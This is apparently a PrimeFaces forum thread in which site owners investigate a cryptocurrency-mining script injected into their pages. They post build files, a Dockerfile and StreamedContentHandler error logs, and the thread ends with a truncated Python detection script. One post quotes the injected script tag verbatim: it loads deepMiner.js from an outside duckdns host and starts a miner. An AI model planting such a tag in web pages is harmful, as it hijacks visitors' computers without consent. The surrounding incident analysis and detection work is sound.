I've been running PrimeFaces apps for years without any similar problems.
If you think it's PrimeFaces related, we need some evidence or further analysis.
Nobody can help with this information. Debug and post more info on who adds the script and how it is added.
Also, 5.3 is already quite old... Use 6.2RC1 to get the latest fixes.
URGENT: Mining-script in PrimeFaces-Page? Where does it come from??
Thomas Andraschko
PrimeFaces | PrimeFaces Extensions
Apache Member | OpenWebBeans, DeltaSpike, MyFaces, BVal, TomEE
Sponsor me: https://github.com/sponsors/tandraschko
Blog: http://tandraschko.blogspot.de/
Twitter: https://twitter.com/TAndraschko
It doesn't change the behavior of the site, it only has influence on the CPU load.
tandraschko wrote (13 Jan 2018, 16:56): I've been running PrimeFaces apps for years without any similar problems.
Nevertheless... as you can see, I'm not the only one with this problem.
Perhaps I am the first one who detected these embedded scripts.
The "infected" sites are all built with PrimeFaces. Search for the script posted before.
tandraschko wrote (13 Jan 2018, 16:56): If you think it's PrimeFaces related, we need some evidence or further analysis.
I am not the only one. There seems to be a relation to PrimeFaces.
That's why I posted this issue. At this time I can only report that there's the possibility to embed scripts in PrimeFaces-related sites (on the server side, no clients involved).
tandraschko wrote (13 Jan 2018, 16:56): Nobody can help with this information. Debug and post more info on who adds the script and how it is added.
The site is quite big and runs really fine with 5.3.
tandraschko wrote (13 Jan 2018, 16:56): Also, 5.3 is already quite old... Use 6.2RC1 to get the latest fixes.
I also have this vulnerability/mining script on my site
After a docker container restart the script is gone from the pages, and it returns again after several hours.
I used the docker container jboss/wildfly:11.0.0.Final from Docker Hub, official repository.
I provide primefaces-5.2.jar as a module for WildFly; you can download it for analysis from here
COPY docker/wildfly/modules $JBOSS_MODULEPATH
Docker
FROM jboss/wildfly:11.0.0.Final
MAINTAINER Ukraine <sp452@i.ua>
ENV JBOSS_MODULEPATH=/opt/jboss/wildfly/modules
COPY docker/wildfly/modules $JBOSS_MODULEPATH
COPY docker/wildfly/standalone.xml /opt/jboss/wildfly/standalone/configuration/standalone.xml
COPY deployments/spring-api.war /opt/jboss/wildfly/standalone/deployments
COPY deployments/ROOT.war /opt/jboss/wildfly/standalone/deployments
ADD docker/run.sh /usr/local/bin/wildfly
CMD ["/usr/local/bin/wildfly"]
pom.xml
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>com.zinrad.rs</groupId>
<artifactId>rs</artifactId>
<version>0.0.1</version>
<packaging>pom</packaging>
<name>RS - zinrad.com</name>
<description>zinrad.com</description>
<parent>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-parent</artifactId>
<version>1.5.9.RELEASE</version>
</parent>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.war.plugin>3.2.0</maven.war.plugin>
<maven.compiler.target>1.8</maven.compiler.target>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.version>3.7.0</maven.compiler.version>
<maven.surefire.version>2.20.1</maven.surefire.version>
<maven.release.version>2.5.3</maven.release.version>
<version.jboss.bom>8.2.2.Final</version.jboss.bom>
<version.jboss.spec.javaee.7.0>1.0.0.Final</version.jboss.spec.javaee.7.0>
<org.primefaces-version>5.2</org.primefaces-version>
<org.primefaces.themes-version>1.0.10</org.primefaces.themes-version>
<org.apache.camel.version>2.18.2</org.apache.camel.version>
</properties>
<modules>
<module>rs-app</module>
<!-- <module>rs-nomenclature</module> -->
<!-- <module>rs-shop</module> -->
<module>spring-api</module>
</modules>
<profiles>
<profile>
<id>default</id>
<activation>
<activeByDefault>true</activeByDefault>
</activation>
<build>
<plugins>
<plugin>
<artifactId>maven-surefire-plugin</artifactId>
<configuration>
<skip>true</skip>
</configuration>
</plugin>
</plugins>
</build>
</profile>
</profiles>
<build>
<pluginManagement>
<plugins>
<plugin>
<groupId>org.owasp</groupId>
<artifactId>dependency-check-maven</artifactId>
<version>3.1.0</version>
<executions>
<execution>
<goals>
<goal>check</goal>
</goals>
</execution>
</executions>
</plugin>
<plugin>
<artifactId>maven-compiler-plugin</artifactId>
<version>${maven.compiler.version}</version>
<configuration>
<source>${maven.compiler.source}</source>
<target>${maven.compiler.target}</target>
<encoding>${project.build.sourceEncoding}</encoding>
</configuration>
</plugin>
<plugin>
<artifactId>maven-war-plugin</artifactId>
<version>${maven.war.plugin}</version>
<configuration>
<warName>${project.artifactId}</warName>
<failOnMissingWebXml>false</failOnMissingWebXml>
<outputDirectory>deployments</outputDirectory>
<archive>
<addMavenDescriptor>false</addMavenDescriptor>
<manifestEntries>
<Build-Time>${maven.build.timestamp}</Build-Time>
<Dependencies>org.infinispan export, org.hibernate export</Dependencies>
</manifestEntries>
</archive>
</configuration>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-javadoc-plugin</artifactId>
<version>3.0.0</version>
<configuration>
<show>private</show>
<nohelp>true</nohelp>
</configuration>
</plugin>
<plugin>
<groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-surefire-plugin</artifactId>
<version>${maven.surefire.version}</version>
<configuration>
<parallel>methods</parallel>
<threadCount>10</threadCount>
<systemPropertyVariables>
<arquillian.launch>arquillian-wildfly-remote</arquillian.launch>
</systemPropertyVariables>
</configuration>
</plugin>
<plugin>
<artifactId>maven-release-plugin</artifactId>
<version>${maven.release.version}</version>
<configuration>
<pushChanges>false</pushChanges>
<localCheckout>true</localCheckout>
</configuration>
</plugin>
</plugins>
</pluginManagement>
</build>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>org.wildfly.bom</groupId>
<artifactId>jboss-javaee-7.0-with-hibernate</artifactId>
<version>${version.jboss.bom}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<!-- Apache Camel -->
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-core</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
<type>jar</type>
</dependency>
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-blueprint</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-stream</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-cdi</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.apache.camel</groupId>
<artifactId>camel-servlet</artifactId>
<version>${org.apache.camel.version}</version>
<scope>provided</scope>
</dependency>
<!-- blueprint web -->
<dependency>
<groupId>org.apache.aries.blueprint</groupId>
<artifactId>org.apache.aries.blueprint.web</artifactId>
<version>1.0.0</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<version>4.12</version>
<scope>test</scope>
</dependency>
</dependencies>
</dependencyManagement>
<repositories>
<repository>
<id>central</id>
<url>https://repo1.maven.org/maven2</url>
<releases>
<enabled>true</enabled>
</releases>
</repository>
<repository>
<id>jboss-public-repository-group</id>
<name>JBoss Public Repository Group</name>
<url>https://repository.jboss.org/nexus/content/groups/public</url>
</repository>
<repository>
<id>prime-repo</id>
<name>PrimeFaces Maven Repository</name>
<url>https://repository.primefaces.org</url>
<layout>default</layout>
<releases>
<enabled>true</enabled>
</releases>
<snapshots>
<enabled>false</enabled>
</snapshots>
</repository>
<repository>
<id>google-api-services</id>
<url>https://oss.sonatype.org/content/repositories/releases/</url>
</repository>
<repository>
<id>burtsev-net-maven</id>
<name>Burtsev.Net Maven Repository</name>
<url>http://maven.burtsev.net</url>
</repository>
</repositories>
</project>
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>emetemunoy</groupId>
<artifactId>rs-app</artifactId>
<version>0.1.15</version>
<packaging>war</packaging>
<name>Zinrad legacy app</name>
<description>zinrad.com</description>
<parent>
<groupId>com.zinrad.rs</groupId>
<artifactId>rs</artifactId>
<version>0.0.1</version>
</parent>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.compiler.source>1.8</maven.compiler.source>
<maven.compiler.target>1.8</maven.compiler.target>
<version.jboss.spec.javaee.7.0>1.1.0.Final</version.jboss.spec.javaee.7.0>
<org.ocpsoft.rewrite>2.0.7.Final</org.ocpsoft.rewrite>
<mysql-connector-version>5.1.34</mysql-connector-version>
<javax.faces-version>2.2.0</javax.faces-version>
<org.apache.poi.version>3.12</org.apache.poi.version>
<org.primefaces-version>5.2</org.primefaces-version>
<org.primefaces.themes-version>1.0.10</org.primefaces.themes-version>
<org.springframework.version>4.2.0.RELEASE</org.springframework.version>
<org.springsecurity-version>3.2.8.RELEASE</org.springsecurity-version>
<!-- <org.springsecurity-version>4.0.2.RELEASE</org.springsecurity-version> -->
<org.springframework.webflow>2.4.0.RELEASE</org.springframework.webflow>
<com.h2database-version>1.4.191</com.h2database-version>
<infinispan.version>5.1.4.FINAL</infinispan.version>
<org.slf4j-version>1.7.12</org.slf4j-version>
<com.itextpdf-version>5.5.4</com.itextpdf-version>
<com.itextpdf.tool-version>5.5.4</com.itextpdf.tool-version>
<cglib-version>3.0</cglib-version>
<jboss.bom.version>1.0.7.Final</jboss.bom.version>
<version.io.swagger>1.5.17</version.io.swagger>
<version.arquillian.spring>1.0.0.Beta2</version.arquillian.spring>
<version.arquillian.transaction>1.0.0.Final-SNAPSHOT</version.arquillian.transaction>
</properties>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>org.jboss.spec</groupId>
<artifactId>jboss-javaee-7.0</artifactId>
<version>${version.jboss.spec.javaee.7.0}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>org.jboss.bom</groupId>
<artifactId>jboss-javaee-6.0-with-hibernate</artifactId>
<version>${jboss.bom.version}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
<dependency>
<groupId>org.jboss.bom</groupId>
<artifactId>jboss-javaee-6.0-with-transactions</artifactId>
<version>${jboss.bom.version}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<dependencies>
<dependency>
<groupId>javax</groupId>
<artifactId>javaee-api</artifactId>
<version>7.0</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>com.h2database</groupId>
<artifactId>h2</artifactId>
<!-- <version>${com.h2database-version}</version> -->
</dependency>
<dependency>
<groupId>joda-time</groupId>
<artifactId>joda-time</artifactId>
<!-- <version>2.3</version> -->
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi</artifactId>
<version>${org.apache.poi.version}</version>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml</artifactId>
<version>${org.apache.poi.version}</version>
<exclusions>
<exclusion>
<artifactId>dom4j</artifactId>
<groupId>dom4j</groupId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.apache.poi</groupId>
<artifactId>poi-ooxml-schemas</artifactId>
<version>${org.apache.poi.version}</version>
</dependency>
<!-- Google -->
<!-- gdata -->
<dependency>
<groupId>com.google.gdata.gdata-java-client</groupId>
<artifactId>gdata-photos-2.0</artifactId>
<version>1.47.1</version>
</dependency>
<dependency>
<groupId>com.google.gdata.gdata-java-client</groupId>
<artifactId>gdata-appsforyourdomain-1.0</artifactId>
<version>1.47.1</version>
</dependency>
<dependency>
<groupId>com.google.api-client</groupId>
<artifactId>google-api-client</artifactId>
<version>1.22.0</version>
<type>jar</type>
</dependency>
<dependency>
<groupId>com.google.http-client</groupId>
<artifactId>google-http-client-jackson</artifactId>
<version>1.22.0</version>
<type>jar</type>
</dependency>
<dependency>
<groupId>javax.transaction</groupId>
<artifactId>jta</artifactId>
<version>1.1</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>commons-io</groupId>
<artifactId>commons-io</artifactId>
<version>2.4</version>
<scope>provided</scope>
</dependency>
<!-- <dependency> -->
<!-- <groupId>commons-fileupload</groupId> -->
<!-- <artifactId>commons-fileupload</artifactId> -->
<!-- <version>1.3.1</version> -->
<!-- <scope>provided</scope> -->
<!-- </dependency> -->
<dependency>
<groupId>javax.mail</groupId>
<artifactId>mail</artifactId>
<scope>provided</scope>
</dependency>
<!-- First declare the APIs we depend on and need for compilation. All
of them are provided by JBoss AS 7 -->
<!-- Import the CDI API, we use provided scope as the API is included in
JBoss AS 7 -->
<dependency>
<groupId>javax.enterprise</groupId>
<artifactId>cdi-api</artifactId>
<scope>provided</scope>
</dependency>
<!-- Import the Common Annotations API (JSR-250), we use provided scope
as the API is included in JBoss AS 7 -->
<dependency>
<groupId>org.jboss.spec.javax.annotation</groupId>
<artifactId>jboss-annotations-api_1.2_spec</artifactId>
<scope>provided</scope>
</dependency>
<!-- Import the JAX-RS API, we use provided scope as the API is included
in JBoss AS 7 -->
<dependency>
<groupId>org.jboss.spec.javax.ws.rs</groupId>
<artifactId>jboss-jaxrs-api_2.0_spec</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>io.swagger</groupId>
<artifactId>swagger-jaxrs</artifactId>
<version>${version.io.swagger}</version>
</dependency>
<!-- Import the JPA API, we use provided scope as the API is included in
JBoss AS 7 -->
<dependency>
<groupId>org.hibernate.javax.persistence</groupId>
<artifactId>hibernate-jpa-2.1-api</artifactId>
<scope>provided</scope>
</dependency>
<!-- Import the EJB API, we use provided scope as the API is included in
JBoss AS 7 -->
<dependency>
<groupId>org.jboss.spec.javax.ejb</groupId>
<artifactId>jboss-ejb-api_3.1_spec</artifactId>
<scope>provided</scope>
</dependency>
<!-- Now we declare any tools needed -->
<!-- Annotation processor to generate the JPA 2.0 metamodel classes for
typesafe criteria queries -->
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-jpamodelgen</artifactId>
<scope>provided</scope>
</dependency>
<!-- JSR-303 (Bean Validation) Implementation -->
<!-- Provides portable constraints such as @Email -->
<!-- Annotation processor that raising compilation errors whenever constraint
annotations are incorrectly used. -->
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-validator-annotation-processor</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-core</artifactId>
<scope>provided</scope>
<!-- <version>${org.hibernate.version}</version> -->
<exclusions>
<exclusion>
<artifactId>xml-apis</artifactId>
<groupId>xml-apis</groupId>
</exclusion>
<exclusion>
<artifactId>antlr</artifactId>
<groupId>antlr</groupId>
</exclusion>
<exclusion>
<artifactId>jboss-logging</artifactId>
<groupId>org.jboss.logging</groupId>
</exclusion>
<exclusion>
<artifactId>dom4j</artifactId>
<groupId>dom4j</groupId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-annotations</artifactId>
<version>3.5.6-Final</version>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-infinispan</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-jbosscache</artifactId>
<version>3.6.10.Final</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.hibernate</groupId>
<artifactId>hibernate-entitymanager</artifactId>
<scope>provided</scope>
<exclusions>
<exclusion>
<artifactId>jboss-logging</artifactId>
<groupId>org.jboss.logging</groupId>
</exclusion>
<exclusion>
<artifactId>dom4j</artifactId>
<groupId>dom4j</groupId>
</exclusion>
</exclusions>
</dependency>
<!-- Optional, but highly recommended -->
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-web</artifactId>
<exclusions>
<exclusion>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-tomcat</artifactId>
</exclusion>
</exclusions>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-data-jpa</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-jdbc</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-starter-security</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.security</groupId>
<artifactId>spring-security-taglibs</artifactId>
</dependency>
<dependency>
<groupId>org.springframework.webflow</groupId>
<artifactId>spring-faces</artifactId>
<version>2.4.7.RELEASE</version>
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-api</artifactId>
<scope>compile</scope>
<!-- <version>${org.slf4j-version}</version> -->
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>jcl-over-slf4j</artifactId>
<scope>compile</scope>
<!-- <version>${org.slf4j-version}</version> -->
</dependency>
<dependency>
<groupId>org.slf4j</groupId>
<artifactId>slf4j-log4j12</artifactId>
<scope>compile</scope>
<!-- <version>${org.slf4j-version}</version> -->
</dependency>
<dependency>
<groupId>mysql</groupId>
<artifactId>mysql-connector-java</artifactId>
<!-- <version>${mysql-connector-version}</version> -->
</dependency>
<!-- Import the JSF API, we use provided scope as the API is included in
JBoss AS 7 -->
<!-- Import the JSF & JSP API -->
<dependency>
<groupId>org.jboss.spec.javax.servlet</groupId>
<artifactId>jboss-servlet-api_3.1_spec</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.jboss.spec.javax.faces</groupId>
<artifactId>jboss-jsf-api_2.2_spec</artifactId>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.primefaces</groupId>
<artifactId>primefaces</artifactId>
<version>${org.primefaces-version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.primefaces.themes</groupId>
<artifactId>all-themes</artifactId>
<version>${org.primefaces.themes-version}</version>
<scope>provided</scope>
</dependency>
<dependency>
<groupId>org.ocpsoft.rewrite</groupId>
<artifactId>rewrite-servlet</artifactId>
<version>${org.ocpsoft.rewrite}</version>
</dependency>
<dependency>
<groupId>org.ocpsoft.rewrite</groupId>
<artifactId>rewrite-config-prettyfaces</artifactId>
<version>${org.ocpsoft.rewrite}</version>
</dependency>
<dependency>
<groupId>org.ocpsoft.rewrite</groupId>
<artifactId>rewrite-integration-faces</artifactId>
<version>${org.ocpsoft.rewrite}</version>
</dependency>
<dependency>
<groupId>org.ocpsoft.rewrite</groupId>
<artifactId>rewrite-integration-spring</artifactId>
<version>${org.ocpsoft.rewrite}</version>
</dependency>
<!-- Reports -->
<dependency>
<groupId>net.sf.jasperreports</groupId>
<artifactId>jasperreports</artifactId>
<version>5.5.0</version>
</dependency>
<dependency>
<groupId>net.sf.jasperreports</groupId>
<artifactId>jasperreports-fonts</artifactId>
<version>4.0.0</version>
</dependency>
<dependency>
<groupId>com.itextpdf</groupId>
<artifactId>itextpdf</artifactId>
<version>${com.itextpdf-version}</version>
<type>jar</type>
</dependency>
<dependency>
<groupId>com.itextpdf.tool</groupId>
<artifactId>xmlworker</artifactId>
<version>${com.itextpdf.tool-version}</version>
<type>jar</type>
</dependency>
<dependency>
<groupId>junit</groupId>
<artifactId>junit</artifactId>
<scope>test</scope>
</dependency>
<!-- End -->
</dependencies>
<prerequisites>
<maven>3.0.4</maven>
</prerequisites>
<build>
<!-- Maven will append the version to the finalName (which is the name
given to the generated war, and hence the context root) -->
<finalName>${project.artifactId}</finalName>
<resources>
<resource>
<directory>src/main/resources</directory>
<filtering>false</filtering>
</resource>
</resources>
<plugins>
<plugin>
<artifactId>maven-compiler-plugin</artifactId>
<configuration>
<source>${maven.compiler.source}</source>
<target>${maven.compiler.target}</target>
<encoding>${project.build.sourceEncoding}</encoding>
</configuration>
</plugin>
<plugin>
<artifactId>maven-war-plugin</artifactId>
<configuration>
<!-- Java EE 6 doesn't require web.xml, Maven needs to catch up! -->
<outputDirectory>deployments</outputDirectory>
<warName>ROOT</warName>
<failOnMissingWebXml>false</failOnMissingWebXml>
<archive>
<manifestEntries>
<Dependencies>org.infinispan export, org.hibernate export</Dependencies>
</manifestEntries>
</archive>
</configuration>
</plugin>
<!-- The JBoss AS plugin deploys your war to a local JBoss AS container -->
<!-- To use, run: mvn package jboss-as:deploy -->
<plugin>
<artifactId>maven-surefire-plugin</artifactId>
</plugin>
<plugin>
<groupId>org.wildfly.plugins</groupId>
<artifactId>wildfly-maven-plugin</artifactId>
<version>1.2.1.Final</version>
</plugin>
</plugins>
</build>
<reporting>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>versions-maven-plugin</artifactId>
<version>2.1</version>
<reportSets>
<reportSet>
<reports>
<report>dependency-updates-report</report>
<report>plugin-updates-report</report>
<report>property-updates-report</report>
</reports>
</reportSet>
</reportSets>
</plugin>
</plugins>
</reporting>
<profiles>
<profile>
<id>default</id>
<activation>
<activeByDefault>true</activeByDefault>
</activation>
<build>
<plugins>
<plugin>
<artifactId>maven-surefire-plugin</artifactId>
<configuration>
<skip>true</skip>
</configuration>
</plugin>
</plugins>
</build>
</profile>
<profile>
<!-- When built in OpenShift the 'openshift' profile will be used when
invoking mvn. -->
<!-- Use this profile for any OpenShift specific customization your app
will need. -->
<!-- By default that is to put the resulting archive into the 'deployments'
folder. -->
<!-- http://maven.apache.org/guides/mini/guide-building-for-different-environments.html -->
<id>openshift</id>
<build>
<plugins>
<plugin>
<artifactId>maven-war-plugin</artifactId>
<version>3.2.0</version>
<configuration>
<outputDirectory>deployments</outputDirectory>
<warName>ROOT</warName>
<archive>
<manifestEntries>
<Dependencies>org.infinispan export</Dependencies>
</manifestEntries>
</archive>
</configuration>
</plugin>
</plugins>
</build>
</profile>
</profiles>
</project>
Yeah I agree, but I think somehow someone hacked your machine to add this bitcoin miner to it. I am not sure how they got in or how they were able to install a script on your outgoing responses.
https://github.com/deepwn/deepMiner
I am fascinated, please keep us up to date if you figure out how they did it.
PrimeFaces Developer | PrimeFaces Extensions Developer
GitHub Profile: https://github.com/melloware
PrimeFaces Elite 13.0.0 / PF Extensions 13.0.0
PrimeReact 9.6.1
Also found these 2 articles:
https://blog.sucuri.net/2017/09/hacked- ... ncies.html
https://blog.sucuri.net/2018/01/malicio ... art-2.html
Also I am leaning towards it being an exploit in your Apache web server:
https://serverfault.com/questions/56148 ... y-the-flaw
I have got the same issue today in two different domains on the same server. One of the domains is using PrimeFaces 5.2 on Payara.
This has been injected into all pages (I have changed the code in the Anonymous function):
<script src="https://jhondi33.duckdns.org:7777/deepMiner.js"></script><script>var miner = new deepMiner.Anonymous("5553x393mfdsfs");miner.start();</script> </title><script type="text/javascript" src="/javax.faces.resource/app.min.js.xhtml?ln=js"></script>
I have found the following in the log file where PrimeFaces 5.2 is running:
java.io.IOException: javax.el.ELException: java.lang.IllegalArgumentException: Cannot convert
of type class java.lang.String to interface org.primefaces.model.StreamedContent
at org.primefaces.application.resource.StreamedContentHandler.handle(StreamedContentHandler.java:94)
at org.primefaces.application.resource.PrimeResourceHandler.handleResourceRequest(PrimeResourceHandler.java:72)
at javax.faces.application.ResourceHandlerWrapper.handleResourceRequest(ResourceHandlerWrapper.java:153)
at javax.faces.application.ResourceHandlerWrapper.handleResourceRequest(ResourceHandlerWrapper.java:153)
at javax.faces.webapp.FacesServlet.service(FacesServlet.java:655)
at org.apache.catalina.core.StandardWrapper.service(StandardWrapper.java:1606)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:338)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.ocpsoft.rewrite.servlet.RewriteFilter.doFilter(RewriteFilter.java:205)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:250)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.tuckey.web.filters.urlrewrite.RuleChain.handleRewrite(RuleChain.java:176)
at org.tuckey.web.filters.urlrewrite.RuleChain.doRules(RuleChain.java:145)
at org.tuckey.web.filters.urlrewrite.UrlRewriter.processRequest(UrlRewriter.java:92)
at org.tuckey.web.filters.urlrewrite.UrlRewriteFilter.doFilter(UrlRewriteFilter.java:389)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:250)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:256)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:160)
at org.apache.catalina.core.StandardPipeline.doInvoke(StandardPipeline.java:654)
at org.apache.catalina.core.StandardPipeline.invoke(StandardPipeline.java:593)
at com.sun.enterprise.web.WebPipeline.invoke(WebPipeline.java:99)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:155)
at org.apache.catalina.connector.CoyoteAdapter.doService(CoyoteAdapter.java:371)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:238)
at com.sun.enterprise.v3.services.impl.ContainerMapper$HttpHandlerCallable.call(ContainerMapper.java:466)
at com.sun.enterprise.v3.services.impl.ContainerMapper.service(ContainerMapper.java:169)
at org.glassfish.grizzly.http.server.HttpHandler.runService(HttpHandler.java:206)
at org.glassfish.grizzly.http.server.HttpHandler.doHandle(HttpHandler.java:180)
at org.glassfish.grizzly.http.server.HttpServerFilter.handleRead(HttpServerFilter.java:235)
at org.glassfish.grizzly.filterchain.ExecutorResolver$9.execute(ExecutorResolver.java:119)
at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeFilter(DefaultFilterChain.java:284)
at org.glassfish.grizzly.filterchain.DefaultFilterChain.executeChainPart(DefaultFilterChain.java:201)
at org.glassfish.grizzly.filterchain.DefaultFilterChain.execute(DefaultFilterChain.java:133)
at org.glassfish.grizzly.filterchain.DefaultFilterChain.process(DefaultFilterChain.java:112)
at org.glassfish.grizzly.ProcessorExecutor.execute(ProcessorExecutor.java:77)
at org.glassfish.grizzly.nio.transport.TCPNIOTransport.fireIOEvent(TCPNIOTransport.java:539)
at org.glassfish.grizzly.strategies.AbstractIOStrategy.fireIOEvent(AbstractIOStrategy.java:112)
at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.run0(WorkerThreadIOStrategy.java:117)
at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy.access$100(WorkerThreadIOStrategy.java:56)
at org.glassfish.grizzly.strategies.WorkerThreadIOStrategy$WorkerThreadRunnable.run(WorkerThreadIOStrategy.java:137)
at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.doWork(AbstractThreadPool.java:593)
at org.glassfish.grizzly.threadpool.AbstractThreadPool$Worker.run(AbstractThreadPool.java:573)
at java.lang.Thread.run(Thread.java:748)
Caused by: javax.el.ELException: java.lang.IllegalArgumentException: Cannot convert
of type class java.lang.String to interface org.primefaces.model.StreamedContent
at com.sun.el.ExpressionFactoryImpl.coerceToType(ExpressionFactoryImpl.java:87)
at org.jboss.weld.util.el.ForwardingExpressionFactory.coerceToType(ForwardingExpressionFactory.java:38)
at javax.el.ELContext.convertToType(ELContext.java:478)
at com.sun.el.lang.EvaluationContext.convertToType(EvaluationContext.java:166)
at com.sun.el.ValueExpressionImpl.getValue(ValueExpressionImpl.java:229)
at org.jboss.weld.el.WeldValueExpression.getValue(WeldValueExpression.java:50)
at org.primefaces.application.resource.StreamedContentHandler.handle(StreamedContentHandler.java:58)
... 43 more
Caused by: java.lang.IllegalArgumentException: Cannot convert
of type class java.lang.String to interface org.primefaces.model.StreamedContent
at com.sun.el.lang.ELSupport.coerceToType(ELSupport.java:424)
at com.sun.el.ExpressionFactoryImpl.coerceToType(ExpressionFactoryImpl.java:85)
... 49 more
]]
Last edited by tak3shi on 15 Jan 2018, 23:56, edited 2 times in total.
OK and you are using PF 6.1 and are you using an Apache Web Server in front of your Payara server? Just trying to narrow down the relationship of how this script is getting injected.
Yes, I can confirm this too.
Copied "as found" in my log (including the empty lines; [Server:frontend01] is the node's name):
[Server:frontend01] 23:22:14,785 SEVERE [org.primefaces.application.resource.StreamedContentHandler] (default task-29) Error in streaming dynamic resource. java.lang.IllegalArgumentException: Cannot convert
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01]
[Server:frontend01] of type class java.lang.String to interface org.primefaces.model.StreamedContent
Right after this snippet the mining-script is injected.
Thanks for your help and your time!
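The two artifacts posted in this thread, the StreamedContentHandler "Cannot convert ... StreamedContent" log record and the off-site script tag in served pages, can be searched for with a small triage script. This is an added example, not code from the thread or from PrimeFaces; the sample log lines, the host names and the MAX_SPAN limit are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# WildFly domain mode prefixes every line with the node name, as in the thread.
NODE_PREFIX = re.compile(r"^\[Server:[^\]]+\]\s?")
TIMESTAMP = re.compile(r"^(\d{2}:\d{2}:\d{2},\d{3})\s+SEVERE")
MSG_START = "Cannot convert"
MSG_END = re.compile(
    r"of type class \S+ to interface org\.primefaces\.model\.StreamedContent")
MAX_SPAN = 50  # assumption: a record not closed within 50 lines is ignored
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*[\"']([^\"']+)[\"']", re.I)


def find_streamed_content_errors(log_text):
    """Return one record per StreamedContent coercion error in a server log.

    The message wraps over several lines in both posted logs, and the Payara
    trace repeats it in every "Caused by:" section, so those are skipped.
    """
    lines = [NODE_PREFIX.sub("", line) for line in log_text.splitlines()]
    hits = []
    i = 0
    while i < len(lines):
        line = lines[i]
        if MSG_START in line and not line.lstrip().startswith("Caused by:"):
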